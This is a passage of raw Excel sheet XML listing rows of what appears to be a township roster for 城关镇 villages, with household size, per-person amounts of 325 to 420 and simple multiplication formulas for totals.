      <c r="C685" s="24" t="str">
        <f>C684</f>
        <v>城关中华村</v>
      </c>
      <c r="D685" s="37" t="s">
        <v>1855</v>
      </c>
      <c r="E685" s="31" t="s">
        <v>1856</v>
      </c>
      <c r="F685" s="24" t="str">
        <f>F684</f>
        <v>4113210108</v>
      </c>
      <c r="G685" s="24"/>
      <c r="H685" s="24"/>
      <c r="I685" s="24">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="J685" s="24"/>
      <c r="K685" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="686" customHeight="1" spans="1:11">
      <c r="A686" s="23" t="s">
        <v>1857</v>
      </c>
      <c r="B686" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C686" s="24" t="s">
        <v>1841</v>
      </c>
      <c r="D686" s="24" t="s">
        <v>1858</v>
      </c>
      <c r="E686" s="24" t="s">
        <v>284</v>
      </c>
      <c r="F686" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G686" s="24">
        <v>1</v>
      </c>
      <c r="H686" s="25">
        <v>365</v>
      </c>
      <c r="I686" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J686" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K686" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="687" customHeight="1" spans="1:11">
      <c r="A687" s="23" t="s">
        <v>1859</v>
      </c>
      <c r="B687" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C687" s="24" t="s">
        <v>1841</v>
      </c>
      <c r="D687" s="24" t="s">
        <v>1860</v>
      </c>
      <c r="E687" s="24" t="s">
        <v>1699</v>
      </c>
      <c r="F687" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G687" s="24">
        <v>1</v>
      </c>
      <c r="H687" s="25">
        <v>365</v>
      </c>
      <c r="I687" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J687" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K687" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="688" customHeight="1" spans="1:11">
      <c r="A688" s="23" t="s">
        <v>1861</v>
      </c>
      <c r="B688" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C688" s="24" t="s">
        <v>1862</v>
      </c>
      <c r="D688" s="24" t="s">
        <v>1863</v>
      </c>
      <c r="E688" s="24" t="s">
        <v>306</v>
      </c>
      <c r="F688" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G688" s="24">
        <v>1</v>
      </c>
      <c r="H688" s="25">
        <v>365</v>
      </c>
      <c r="I688" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J688" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K688" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="689" customHeight="1" spans="1:11">
      <c r="A689" s="23" t="s">
        <v>1864</v>
      </c>
      <c r="B689" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C689" s="24" t="s">
        <v>1862</v>
      </c>
      <c r="D689" s="24" t="s">
        <v>1865</v>
      </c>
      <c r="E689" s="24" t="s">
        <v>1866</v>
      </c>
      <c r="F689" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G689" s="24">
        <v>1</v>
      </c>
      <c r="H689" s="25">
        <v>365</v>
      </c>
      <c r="I689" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J689" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K689" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="690" customHeight="1" spans="1:11">
      <c r="A690" s="23" t="s">
        <v>1867</v>
      </c>
      <c r="B690" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C690" s="24" t="s">
        <v>1691</v>
      </c>
      <c r="D690" s="24" t="s">
        <v>1868</v>
      </c>
      <c r="E690" s="24" t="s">
        <v>1869</v>
      </c>
      <c r="F690" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G690" s="24">
        <v>1</v>
      </c>
      <c r="H690" s="25">
        <v>365</v>
      </c>
      <c r="I690" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J690" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K690" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="691" customHeight="1" spans="1:11">
      <c r="A691" s="23" t="s">
        <v>1870</v>
      </c>
      <c r="B691" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C691" s="24" t="s">
        <v>1708</v>
      </c>
      <c r="D691" s="24" t="s">
        <v>1871</v>
      </c>
      <c r="E691" s="24" t="s">
        <v>1872</v>
      </c>
      <c r="F691" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G691" s="24">
        <v>1</v>
      </c>
      <c r="H691" s="25">
        <v>365</v>
      </c>
      <c r="I691" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J691" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K691" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="692" customHeight="1" spans="1:11">
      <c r="A692" s="23" t="s">
        <v>1873</v>
      </c>
      <c r="B692" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C692" s="24" t="s">
        <v>1691</v>
      </c>
      <c r="D692" s="24" t="s">
        <v>1874</v>
      </c>
      <c r="E692" s="24" t="s">
        <v>1875</v>
      </c>
      <c r="F692" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G692" s="24">
        <v>1</v>
      </c>
      <c r="H692" s="25">
        <v>365</v>
      </c>
      <c r="I692" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J692" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K692" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="693" customHeight="1" spans="1:11">
      <c r="A693" s="23" t="s">
        <v>1876</v>
      </c>
      <c r="B693" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C693" s="24" t="s">
        <v>1817</v>
      </c>
      <c r="D693" s="24" t="s">
        <v>1877</v>
      </c>
      <c r="E693" s="24" t="s">
        <v>1257</v>
      </c>
      <c r="F693" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G693" s="24">
        <v>2</v>
      </c>
      <c r="H693" s="25">
        <v>325</v>
      </c>
      <c r="I693" s="24">
        <f t="shared" si="10"/>
        <v>650</v>
      </c>
      <c r="J693" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K693" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="694" customHeight="1" spans="1:11">
      <c r="A694" s="23" t="s">
        <v>1878</v>
      </c>
      <c r="B694" s="24" t="str">
        <f>B693</f>
        <v>城关镇</v>
      </c>
      <c r="C694" s="24" t="str">
        <f>C693</f>
        <v>城关东北村</v>
      </c>
      <c r="D694" s="37" t="s">
        <v>1879</v>
      </c>
      <c r="E694" s="31" t="s">
        <v>1880</v>
      </c>
      <c r="F694" s="24" t="str">
        <f>F693</f>
        <v>4113210103</v>
      </c>
      <c r="G694" s="24"/>
      <c r="H694" s="24"/>
      <c r="I694" s="24">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="J694" s="24"/>
      <c r="K694" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="695" customHeight="1" spans="1:11">
      <c r="A695" s="23" t="s">
        <v>1881</v>
      </c>
      <c r="B695" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C695" s="24" t="s">
        <v>1209</v>
      </c>
      <c r="D695" s="24" t="s">
        <v>1882</v>
      </c>
      <c r="E695" s="27" t="s">
        <v>1883</v>
      </c>
      <c r="F695" s="24" t="s">
        <v>1203</v>
      </c>
      <c r="G695" s="24">
        <v>1</v>
      </c>
      <c r="H695" s="25">
        <v>365</v>
      </c>
      <c r="I695" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J695" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K695" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="696" customHeight="1" spans="1:11">
      <c r="A696" s="23" t="s">
        <v>1884</v>
      </c>
      <c r="B696" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C696" s="24" t="s">
        <v>1778</v>
      </c>
      <c r="D696" s="24" t="s">
        <v>1885</v>
      </c>
      <c r="E696" s="24" t="s">
        <v>435</v>
      </c>
      <c r="F696" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G696" s="24">
        <v>1</v>
      </c>
      <c r="H696" s="25">
        <v>365</v>
      </c>
      <c r="I696" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J696" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K696" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="697" customHeight="1" spans="1:11">
      <c r="A697" s="23" t="s">
        <v>1886</v>
      </c>
      <c r="B697" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C697" s="24" t="s">
        <v>1708</v>
      </c>
      <c r="D697" s="24" t="s">
        <v>1887</v>
      </c>
      <c r="E697" s="24" t="s">
        <v>303</v>
      </c>
      <c r="F697" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G697" s="24">
        <v>1</v>
      </c>
      <c r="H697" s="25">
        <v>365</v>
      </c>
      <c r="I697" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J697" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K697" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="698" customHeight="1" spans="1:11">
      <c r="A698" s="23" t="s">
        <v>1888</v>
      </c>
      <c r="B698" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C698" s="24" t="s">
        <v>1708</v>
      </c>
      <c r="D698" s="24" t="s">
        <v>1889</v>
      </c>
      <c r="E698" s="24" t="s">
        <v>1890</v>
      </c>
      <c r="F698" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G698" s="24">
        <v>1</v>
      </c>
      <c r="H698" s="25">
        <v>365</v>
      </c>
      <c r="I698" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J698" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K698" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="699" customHeight="1" spans="1:11">
      <c r="A699" s="23" t="s">
        <v>1891</v>
      </c>
      <c r="B699" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C699" s="24" t="s">
        <v>1683</v>
      </c>
      <c r="D699" s="24" t="s">
        <v>1892</v>
      </c>
      <c r="E699" s="24" t="s">
        <v>524</v>
      </c>
      <c r="F699" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G699" s="24">
        <v>1</v>
      </c>
      <c r="H699" s="25">
        <v>365</v>
      </c>
      <c r="I699" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J699" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K699" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="700" customHeight="1" spans="1:11">
      <c r="A700" s="23" t="s">
        <v>1893</v>
      </c>
      <c r="B700" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C700" s="24" t="s">
        <v>1683</v>
      </c>
      <c r="D700" s="24" t="s">
        <v>1894</v>
      </c>
      <c r="E700" s="24" t="s">
        <v>1895</v>
      </c>
      <c r="F700" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G700" s="24">
        <v>1</v>
      </c>
      <c r="H700" s="25">
        <v>365</v>
      </c>
      <c r="I700" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J700" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K700" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="701" customHeight="1" spans="1:11">
      <c r="A701" s="23" t="s">
        <v>1896</v>
      </c>
      <c r="B701" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C701" s="24" t="s">
        <v>1897</v>
      </c>
      <c r="D701" s="24" t="s">
        <v>1898</v>
      </c>
      <c r="E701" s="24" t="s">
        <v>1899</v>
      </c>
      <c r="F701" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G701" s="24">
        <v>1</v>
      </c>
      <c r="H701" s="25">
        <v>365</v>
      </c>
      <c r="I701" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J701" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K701" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="702" customHeight="1" spans="1:11">
      <c r="A702" s="23" t="s">
        <v>1900</v>
      </c>
      <c r="B702" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C702" s="24" t="s">
        <v>1683</v>
      </c>
      <c r="D702" s="24" t="s">
        <v>1901</v>
      </c>
      <c r="E702" s="24" t="s">
        <v>269</v>
      </c>
      <c r="F702" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G702" s="24">
        <v>1</v>
      </c>
      <c r="H702" s="25">
        <v>365</v>
      </c>
      <c r="I702" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J702" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K702" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="703" customHeight="1" spans="1:11">
      <c r="A703" s="23" t="s">
        <v>1902</v>
      </c>
      <c r="B703" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C703" s="24" t="s">
        <v>1683</v>
      </c>
      <c r="D703" s="24" t="s">
        <v>1903</v>
      </c>
      <c r="E703" s="24" t="s">
        <v>269</v>
      </c>
      <c r="F703" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G703" s="24">
        <v>1</v>
      </c>
      <c r="H703" s="25">
        <v>365</v>
      </c>
      <c r="I703" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J703" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K703" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="704" customHeight="1" spans="1:11">
      <c r="A704" s="23" t="s">
        <v>1904</v>
      </c>
      <c r="B704" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C704" s="24" t="s">
        <v>1905</v>
      </c>
      <c r="D704" s="24" t="s">
        <v>1906</v>
      </c>
      <c r="E704" s="24" t="s">
        <v>497</v>
      </c>
      <c r="F704" s="24" t="s">
        <v>1203</v>
      </c>
      <c r="G704" s="24">
        <v>1</v>
      </c>
      <c r="H704" s="25">
        <v>365</v>
      </c>
      <c r="I704" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J704" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K704" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="705" customHeight="1" spans="1:11">
      <c r="A705" s="23" t="s">
        <v>1907</v>
      </c>
      <c r="B705" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C705" s="24" t="s">
        <v>1683</v>
      </c>
      <c r="D705" s="24" t="s">
        <v>1908</v>
      </c>
      <c r="E705" s="24" t="s">
        <v>312</v>
      </c>
      <c r="F705" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G705" s="24">
        <v>1</v>
      </c>
      <c r="H705" s="25">
        <v>365</v>
      </c>
      <c r="I705" s="24">
        <f t="shared" si="10"/>
        <v>365</v>
      </c>
      <c r="J705" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K705" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="706" customHeight="1" spans="1:11">
      <c r="A706" s="23" t="s">
        <v>1909</v>
      </c>
      <c r="B706" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C706" s="24" t="s">
        <v>1691</v>
      </c>
      <c r="D706" s="24" t="s">
        <v>1910</v>
      </c>
      <c r="E706" s="24" t="s">
        <v>1911</v>
      </c>
      <c r="F706" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G706" s="24">
        <v>2</v>
      </c>
      <c r="H706" s="25">
        <v>325</v>
      </c>
      <c r="I706" s="24">
        <f t="shared" si="10"/>
        <v>650</v>
      </c>
      <c r="J706" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K706" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="707" customHeight="1" spans="1:11">
      <c r="A707" s="23" t="s">
        <v>1912</v>
      </c>
      <c r="B707" s="24" t="str">
        <f>B706</f>
        <v>城关镇</v>
      </c>
      <c r="C707" s="24" t="str">
        <f>C706</f>
        <v>城关中华</v>
      </c>
      <c r="D707" s="23" t="s">
        <v>1913</v>
      </c>
      <c r="E707" s="23" t="s">
        <v>1403</v>
      </c>
      <c r="F707" s="24" t="str">
        <f>F706</f>
        <v>4113210108</v>
      </c>
      <c r="G707" s="24"/>
      <c r="H707" s="24"/>
      <c r="I707" s="24">
        <f t="shared" si="10"/>
        <v>0</v>
      </c>
      <c r="J707" s="24"/>
      <c r="K707" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="708" customHeight="1" spans="1:11">
      <c r="A708" s="23" t="s">
        <v>1914</v>
      </c>
      <c r="B708" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C708" s="24" t="s">
        <v>1691</v>
      </c>
      <c r="D708" s="24" t="s">
        <v>1915</v>
      </c>
      <c r="E708" s="24" t="s">
        <v>435</v>
      </c>
      <c r="F708" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G708" s="24">
        <v>1</v>
      </c>
      <c r="H708" s="25">
        <v>365</v>
      </c>
      <c r="I708" s="24">
        <f t="shared" ref="I708:I771" si="11">H708*G708</f>
        <v>365</v>
      </c>
      <c r="J708" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K708" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="709" customHeight="1" spans="1:11">
      <c r="A709" s="23" t="s">
        <v>1916</v>
      </c>
      <c r="B709" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C709" s="24" t="s">
        <v>1691</v>
      </c>
      <c r="D709" s="24" t="s">
        <v>1917</v>
      </c>
      <c r="E709" s="24" t="s">
        <v>222</v>
      </c>
      <c r="F709" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G709" s="24">
        <v>2</v>
      </c>
      <c r="H709" s="25">
        <v>325</v>
      </c>
      <c r="I709" s="24">
        <f t="shared" si="11"/>
        <v>650</v>
      </c>
      <c r="J709" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K709" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="710" customHeight="1" spans="1:11">
      <c r="A710" s="23" t="s">
        <v>1918</v>
      </c>
      <c r="B710" s="24" t="str">
        <f>B709</f>
        <v>城关镇</v>
      </c>
      <c r="C710" s="24" t="str">
        <f>C709</f>
        <v>城关中华</v>
      </c>
      <c r="D710" s="37" t="s">
        <v>1919</v>
      </c>
      <c r="E710" s="31" t="s">
        <v>540</v>
      </c>
      <c r="F710" s="24" t="str">
        <f>F709</f>
        <v>4113210108</v>
      </c>
      <c r="G710" s="24"/>
      <c r="H710" s="24"/>
      <c r="I710" s="24">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="J710" s="24"/>
      <c r="K710" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="711" customHeight="1" spans="1:11">
      <c r="A711" s="23" t="s">
        <v>1920</v>
      </c>
      <c r="B711" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C711" s="24" t="s">
        <v>1691</v>
      </c>
      <c r="D711" s="24" t="s">
        <v>1921</v>
      </c>
      <c r="E711" s="24" t="s">
        <v>806</v>
      </c>
      <c r="F711" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G711" s="24">
        <v>1</v>
      </c>
      <c r="H711" s="25">
        <v>365</v>
      </c>
      <c r="I711" s="24">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J711" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K711" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="712" customHeight="1" spans="1:11">
      <c r="A712" s="23" t="s">
        <v>1922</v>
      </c>
      <c r="B712" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C712" s="24" t="s">
        <v>1923</v>
      </c>
      <c r="D712" s="24" t="s">
        <v>1924</v>
      </c>
      <c r="E712" s="24" t="s">
        <v>1925</v>
      </c>
      <c r="F712" s="24" t="s">
        <v>1203</v>
      </c>
      <c r="G712" s="24">
        <v>1</v>
      </c>
      <c r="H712" s="24">
        <v>420</v>
      </c>
      <c r="I712" s="24">
        <f t="shared" si="11"/>
        <v>420</v>
      </c>
      <c r="J712" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K712" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="713" customHeight="1" spans="1:11">
      <c r="A713" s="23" t="s">
        <v>1926</v>
      </c>
      <c r="B713" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C713" s="24" t="s">
        <v>1927</v>
      </c>
      <c r="D713" s="24" t="s">
        <v>1928</v>
      </c>
      <c r="E713" s="24" t="s">
        <v>578</v>
      </c>
      <c r="F713" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G713" s="24">
        <v>1</v>
      </c>
      <c r="H713" s="25">
        <v>365</v>
      </c>
      <c r="I713" s="24">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J713" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K713" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="714" customHeight="1" spans="1:11">
      <c r="A714" s="23" t="s">
        <v>1929</v>
      </c>
      <c r="B714" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C714" s="24" t="s">
        <v>1927</v>
      </c>
      <c r="D714" s="24" t="s">
        <v>1930</v>
      </c>
      <c r="E714" s="24" t="s">
        <v>269</v>
      </c>
      <c r="F714" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G714" s="24">
        <v>2</v>
      </c>
      <c r="H714" s="25">
        <v>325</v>
      </c>
      <c r="I714" s="24">
        <f t="shared" si="11"/>
        <v>650</v>
      </c>
      <c r="J714" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K714" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="715" customHeight="1" spans="1:11">
      <c r="A715" s="23" t="s">
        <v>1931</v>
      </c>
      <c r="B715" s="24" t="str">
        <f>B714</f>
        <v>城关镇</v>
      </c>
      <c r="C715" s="24" t="str">
        <f>C714</f>
        <v>城关镇东北</v>
      </c>
      <c r="D715" s="37" t="s">
        <v>1932</v>
      </c>
      <c r="E715" s="31" t="s">
        <v>331</v>
      </c>
      <c r="F715" s="24" t="str">
        <f>F714</f>
        <v>4113210103</v>
      </c>
      <c r="G715" s="24"/>
      <c r="H715" s="24"/>
      <c r="I715" s="24">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="J715" s="24"/>
      <c r="K715" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="716" customHeight="1" spans="1:11">
      <c r="A716" s="23" t="s">
        <v>1933</v>
      </c>
      <c r="B716" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C716" s="24" t="s">
        <v>1708</v>
      </c>
      <c r="D716" s="24" t="s">
        <v>1934</v>
      </c>
      <c r="E716" s="24" t="s">
        <v>1935</v>
      </c>
      <c r="F716" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G716" s="24">
        <v>1</v>
      </c>
      <c r="H716" s="25">
        <v>365</v>
      </c>
      <c r="I716" s="24">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J716" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K716" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="717" customHeight="1" spans="1:11">
      <c r="A717" s="23" t="s">
        <v>1936</v>
      </c>
      <c r="B717" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C717" s="24" t="s">
        <v>1841</v>
      </c>
      <c r="D717" s="24" t="s">
        <v>1937</v>
      </c>
      <c r="E717" s="24" t="s">
        <v>1938</v>
      </c>
      <c r="F717" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G717" s="24">
        <v>1</v>
      </c>
      <c r="H717" s="25">
        <v>365</v>
      </c>
      <c r="I717" s="24">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J717" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K717" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="718" customHeight="1" spans="1:11">
      <c r="A718" s="23" t="s">
        <v>1939</v>
      </c>
      <c r="B718" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C718" s="24" t="s">
        <v>1209</v>
      </c>
      <c r="D718" s="24" t="s">
        <v>1940</v>
      </c>
      <c r="E718" s="24" t="s">
        <v>1941</v>
      </c>
      <c r="F718" s="24" t="s">
        <v>1203</v>
      </c>
      <c r="G718" s="24">
        <v>1</v>
      </c>
      <c r="H718" s="25">
        <v>365</v>
      </c>
      <c r="I718" s="24">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J718" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K718" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="719" customHeight="1" spans="1:11">
      <c r="A719" s="23" t="s">
        <v>1942</v>
      </c>
      <c r="B719" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C719" s="24" t="s">
        <v>1345</v>
      </c>
      <c r="D719" s="24" t="s">
        <v>1943</v>
      </c>
      <c r="E719" s="24" t="s">
        <v>1944</v>
      </c>
      <c r="F719" s="24" t="s">
        <v>289</v>
      </c>
      <c r="G719" s="24">
        <v>1</v>
      </c>
      <c r="H719" s="25">
        <v>365</v>
      </c>
      <c r="I719" s="24">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J719" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K719" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="720" customHeight="1" spans="1:11">
      <c r="A720" s="23" t="s">
        <v>1945</v>
      </c>
      <c r="B720" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C720" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D720" s="24" t="s">
        <v>1946</v>
      </c>
      <c r="E720" s="24" t="s">
        <v>1947</v>
      </c>
      <c r="F720" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G720" s="24">
        <v>2</v>
      </c>
      <c r="H720" s="25">
        <v>325</v>
      </c>
      <c r="I720" s="24">
        <f t="shared" si="11"/>
        <v>650</v>
      </c>
      <c r="J720" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K720" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="721" customHeight="1" spans="1:11">
      <c r="A721" s="23" t="s">
        <v>1948</v>
      </c>
      <c r="B721" s="24" t="str">
        <f>B720</f>
        <v>城关镇</v>
      </c>
      <c r="C721" s="24" t="str">
        <f>C720</f>
        <v>城关镇中华村</v>
      </c>
      <c r="D721" s="26" t="s">
        <v>1949</v>
      </c>
      <c r="E721" s="26" t="s">
        <v>1950</v>
      </c>
      <c r="F721" s="24" t="str">
        <f>F720</f>
        <v>4113210108</v>
      </c>
      <c r="G721" s="24"/>
      <c r="H721" s="24"/>
      <c r="I721" s="24">
        <f t="shared" si="11"/>
        <v>0</v>
      </c>
      <c r="J721" s="24"/>
      <c r="K721" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="722" customHeight="1" spans="1:11">
      <c r="A722" s="23" t="s">
        <v>1951</v>
      </c>
      <c r="B722" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C722" s="24" t="s">
        <v>1246</v>
      </c>
      <c r="D722" s="24" t="s">
        <v>1952</v>
      </c>
      <c r="E722" s="24" t="s">
        <v>303</v>
      </c>
      <c r="F722" s="24" t="s">
        <v>223</v>
      </c>
      <c r="G722" s="24">
        <v>1</v>
      </c>
      <c r="H722" s="25">
        <v>365</v>
      </c>
      <c r="I722" s="24">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J722" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K722" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="723" customHeight="1" spans="1:11">
      <c r="A723" s="23" t="s">
        <v>1953</v>
      </c>
      <c r="B723" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C723" s="24" t="s">
        <v>1265</v>
      </c>
      <c r="D723" s="24" t="s">
        <v>1954</v>
      </c>
      <c r="E723" s="24" t="s">
        <v>222</v>
      </c>
      <c r="F723" s="24" t="s">
        <v>266</v>
      </c>
      <c r="G723" s="24">
        <v>1</v>
      </c>
      <c r="H723" s="25">
        <v>365</v>
      </c>
      <c r="I723" s="24">
        <f t="shared" si="11"/>
        <v>365</v>
      </c>
      <c r="J723" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K723" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="724" customHeight="1" spans="1:11">
      <c r="A724" s="23" t="s">
        <v>1955</v>
      </c>
      <c r="B724" s="24" t="s">
        <v>219</v>
      </c>
      <c r="C724" s="24" t="s">
        <v>1218</v>
      </c>
      <c r="D724" s="24" t="s">
        <v>1956</v>
      </c>
      <c r="E724" s="24" t="s">
        <v>697</v>
      </c>
      <c r="F724" s="24" t="s">
        <v>233</v>
      </c>
      <c r="G724" s="24">
        <v>2</v>
      </c>
      <c r="H724" s="25">
        <v>325</v>
      </c>
      <c r="I724" s="24">
        <f t="shared" si="11"/>
        <v>650</v>
      </c>
      <c r="J724" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K724" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="725" customHeight="1" spans="1:11">
      <c r="A725" s="23" t="s">
        <v>1957</v>
      </c>
      <c r="B725" s="24" t="str">
        <f>B724</f>
        <v>城关镇</v>
      </c>
